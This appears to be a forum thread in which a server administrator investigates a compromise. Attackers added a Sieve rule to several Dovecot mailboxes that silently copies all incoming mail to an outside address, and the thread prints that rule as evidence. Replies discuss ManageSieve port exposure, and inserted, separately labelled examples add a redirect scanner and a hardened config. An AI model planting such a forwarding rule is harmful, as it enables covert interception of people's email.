dovecot / roundcube sieve hack

th£ lord (Verified User, joined Jan 6, 2007, 47 messages)
Hello friends,
As I mentioned in the topic title, I noticed that e-mail was being forwarded by someone who somehow accessed it from somewhere (I couldn't find the vulnerability).
In short, the e-mail sent to me is also sent directly to the forwarding e-mail address, and thus the conversations are being followed.
The following script had been added to the filters in webmail.

Sample Added Script:

require ["copy"];
# rule:[.]
if true
{
redirect :copy "[email protected]";
}

Files with hacked content (created):

/home/zixxls/imap/xxxxx.com/mimari/.dovecot.sieve (The redirect is written into the content of this file.)
/home/zixxls/imap/xxxxx.com/info/.dovecot.sieve.log

/home/zixxls/imap/xxxxx.com/sales/.dovecot.sieve (The redirect is written into the content of this file.)
/home/zixxls/imap/xxxxx.com/sales/.dovecot.sieve.log
/home/zixxls/imap/xxxxx.com/sales/.dovecot.sieve.log.0

/home/zixxls/imap/xxxxx.com/sales.fac/.dovecot.sieve (The redirect is written into the content of this file.)
/home/zixxls/imap/xxxxx.com/sales.fac/.dovecot.sieve.log
/home/zixxls/imap/xxxxx.com/sales.fac/.dovecot.sieve.log.0

/home/zixxls/imap/xxxxx.com/transport.fac/.dovecot.sieve (The redirect is written into the content of this file.)
/home/zixxls/imap/xxxxx.com/transport.fac/.dovecot.sieve.log


Note:
- My e-mail passwords are quite strong.
- Only Outlook is installed on the computers, and the computers are specially protected with an antivirus program.
- I always try to keep the server updated.


Server operating system information and DirectAdmin versions

NAME="CentOS Linux"
VERSION="8"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="8"
PLATFORM_ID="platform:el8"
PRETTY_NAME="CentOS Linux 8"
CENTOS_MANTISBT_PROJECT="CentOS-8"
CENTOS_MANTISBT_PROJECT_VERSION="8"


  • Apache 2.4.58 Running
  • DirectAdmin 1.661 Running
  • Exim 4.97.1 Running
  • MariaDB 10.4.33 Running
  • Named 9.11.26 Running
  • sshd Running
  • Nginx 1.25.4 Running
  • dovecot 2.3.21 (47349e2482) Running
  • pure-ftpd 1.0.51 Running
  • Php 7.4.33 Installed
  • Php 5.6.40 Installed (php2)

Where could the security vulnerability be, so that I can find the solution to this problem?
I would like to thank in advance my dear friends who have ideas about how this hack was carried out and share them with me.

Regards,
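One way to hunt for rules like the one above across every account on the server, as an added example that is not part of this thread: it parses each account's .dovecot.sieve for redirect actions (the script above uses redirect :copy), flags targets outside the server's own domains, and prints each file's modification time so it can be matched against the RoundCube, FTP, web server and DirectAdmin logs. The path pattern, the own-domain set and the example.net address in the test are assumptions.

```python
import glob
import os
import re
import time

# Assumed DirectAdmin layout, taken from the paths listed in the thread:
#   /home/<user>/imap/<domain>/<account>/.dovecot.sieve
SIEVE_GLOB = "/home/*/imap/*/*/.dovecot.sieve"

# Matches a Sieve redirect action, with or without tags such as :copy,
# and captures the quoted target address, e.g.  redirect :copy "x@y";
REDIRECT_RE = re.compile(r'\bredirect\b(?:\s+:\w+)*\s+"([^"]+)"', re.IGNORECASE)


def strip_comments(script: str) -> str:
    """Remove Sieve '#' line comments and /* */ block comments so that
    commented-out rules are not reported as active redirects."""
    script = re.sub(r"/\*.*?\*/", "", script, flags=re.DOTALL)
    return "\n".join(l for l in script.splitlines() if not l.lstrip().startswith("#"))


def find_redirects(script: str) -> list[str]:
    """All redirect target addresses in a Sieve script."""
    return REDIRECT_RE.findall(strip_comments(script))


def external_redirects(script: str, own_domains) -> list[str]:
    """Redirect targets whose domain is not one of the server's own domains."""
    own = {d.lower() for d in own_domains}
    return [a for a in find_redirects(script) if a.rsplit("@", 1)[-1].lower() not in own]


def scan(own_domains, pattern: str = SIEVE_GLOB) -> list[dict]:
    """Scan every account's Sieve script and report external redirects together
    with the script's last-modification time, for correlation with logs."""
    findings = []
    for path in sorted(glob.glob(pattern)):
        with open(path, encoding="utf-8", errors="replace") as fh:
            targets = external_redirects(fh.read(), own_domains)
        if targets:
            mtime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(os.path.getmtime(path)))
            findings.append({"path": path, "modified": mtime, "targets": targets})
    return findings


if __name__ == "__main__":
    # Replace with the domains actually hosted on the server (assumed value here).
    for f in scan(own_domains={"xxxxx.com"}):
        print(f"{f['modified']}  {f['path']}  ->  {', '.join(f['targets'])}")
```

Run it as root so every account's script is readable; a redirect to an address in one of your own domains is not reported, so add every hosted domain to the set.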
 
Hello,

If you did not modify the listed files, you might check the time of the last modification of the files and which activity can be found at the same time in the RoundCube, FTP, web server and DirectAdmin logs.

Check whether you allow one-click access to RoundCube from DirectAdmin.
Make sure you did not create the filters in RoundCube.
 
Hello zEitEr,
It's nice talking to you.

When I noticed this, I immediately deleted the files and folders.

That's why I don't see any change now. How could they have done this in a different way? For example, if I turn off the Roundcube webmail completely with .htaccess (as a security measure), there will be no problem, since the friends are already connected via Outlook.
I think they can leak the information via Outlook and make this change via Roundcube.

In my research, I found that a different panel user experienced this problem.
I have this same problem now: https://talk.plesk.com/threads/dovecot-roundcube-sieve-hack.362814/

"Check whether you allow one-click access to RoundCube from DirectAdmin."
The connection between DirectAdmin and Roundcube is just a link. The username and password page opens. It doesn't let you in directly. Just the normal settings.
"Make sure you did not create the filters in RoundCube."
I asked all my friends who use e-mail within the company, but no one has done this in Roundcube. Everyone just connects via Outlook.
 
How could they do this in a different way?

Actually, by any means which allows creating or uploading a file on the server: PHP/Perl/bash, FTP, POP/IMAP/SMTP(?), SSH, DirectAdmin, RoundCube, a vulnerable web site of the user, a webshell, etc.

I'm not too sure about Outlook, though. I cannot say whether or not it allows using Sieve/Pigeonhole. It should be checked.

Dovecot listens on port 4190, among others. The port is used for Sieve. By default it's bound to 0.0.0.0:

Code:
# netstat -ntpl | grep 4190
tcp        0      0 0.0.0.0:4190            0.0.0.0:*               LISTEN      1216/dovecot
tcp6       0      0 :::4190                 :::*                    LISTEN      1216/dovecot

If you don't use a firewall, and/or if the port is open worldwide or to a list of IPs, then they could potentially connect to it directly:

Code:
# telnet 127.0.0.1 4190
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
"IMPLEMENTATION" "Dovecot Pigeonhole"
"SIEVE" "fileinto reject envelope encoded-character vacation subaddress comparator-i;ascii-numeric relational regex imap4flags copy include variables body enotify environment mailbox date index ihave duplicate mime foreverypart extracttext"
"NOTIFY" "mailto"
"SASL" "PLAIN"
"STARTTLS"
"VERSION" "1.0"
OK "Dovecot DA ready."

So first of all make sure the port is not accessible outside of your server.
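Besides the firewall, the listener itself can be limited to the loopback address. The following Dovecot 2.3 fragment is an added example, not from this thread or from the configuration DirectAdmin ships; it assumes the only legitimate ManageSieve client is the RoundCube managesieve plugin running on the same host, and that Dovecot is reloaded afterwards.

```conf
# Default: ManageSieve is bound to every interface, which is what the
# netstat output above (0.0.0.0:4190 and :::4190) shows.
#
# service managesieve-login {
#   inet_listener sieve {
#     port = 4190
#   }
# }

# Hardened: only clients on this host (e.g. RoundCube's managesieve plugin)
# can reach the ManageSieve service; remote hosts get no listener at all.
service managesieve-login {
  inet_listener sieve {
    address = 127.0.0.1 ::1
    port = 4190
  }
}
```

After reloading Dovecot, repeat the netstat check from the post: the two 4190 lines should now show 127.0.0.1:4190 and ::1:4190 instead of 0.0.0.0 and :::.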
 


Hello zEitEr,

The CSF firewall is installed on the server. The security settings are more stringent than normal.
The SSH port has been changed and is open only to several private IP addresses.
FTP is publicly accessible, but the accessible area cannot go beyond the relevant host.
When 10 incorrect passwords are entered at login, the server permanently bans the IP address that is trying to connect.
Many well-known security measures such as these are active on the server.

Port 4190:
# netstat -ntpl | grep 4190
tcp 0 0 0.0.0.0:4190 0.0.0.0:* LISTEN 1100/dovecot
tcp6 0 0 :::4190 :::* LISTEN 1100/dovecot

Telnet:

telnet 127.0.0.1 4190
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
"IMPLEMENTATION" "Dovecot Pigeonhole"
"SIEVE" "fileinto reject envelope encoded-character vacation subaddress comparator-i;ascii-numeric relational regex imap4flags copy include variables body enotify environment mailbox date index ihave duplicate mime foreverypart extracttext"
"NOTIFY" "mailto"
"SASL" "PLAIN"
"STARTTLS"
"VERSION" "1.0"
OK "Dovecot DA ready."

- I tested it: the connection failed when I tried to log in via Telnet from outside.
- I also checked it from different online systems outside my own network.


Online check site:
Connection to xxx.xxx.xxx 4190 - fail
Error #110 (Connection timed out)


So what have I done for now? What security precautions did I take?
I enabled IP control on the Roundcube folder with .htaccess.
No IP other than the allowed IPs will be able to access this folder. Since there is IP control on the link, Roundcube will only open for the IP addresses I allow.

/var/www/html/roundcubemail-1.6.6/

If Dovecot or Exim or anything else on the server (I don't know what DirectAdmin uses) is open, I definitely don't think you can log in.
I can only think that someone somehow obtained the e-mail account information configured in Outlook, logged in via mail.domain.com/webmail or domain.com/webmail and added it through their own Roundcube session. Or something different.

In this case, I am watching it constantly. If the security measures I mentioned are still bypassed and the user logs in, then I think there may be a vulnerability on the server. What do you think?

I'm open to all ideas. Really, this can happen to anyone. Thanks.


Note:
I scanned with maldetect version 1.6.4. It did not find any malware.
I uploaded a malware sample into the folder for testing. I scanned again and it still couldn't find it. I wonder if Maldet does not work fully on newer systems? Does anyone have knowledge about this? This is a second issue that I noticed just now while testing.

Regards,
 
In this case, I watch it constantly. If the security measures I mentioned are still bypassed and the user logs in, then I think there may be a vulnerability on the server. What do you think?

You've got the list of ways they could create/overwrite the file. I have nothing to add. Probably somebody has had the same issue and can give more information.

I wonder if Maldet does not work fully on new version systems?

The default malware definition databases are the reason.
 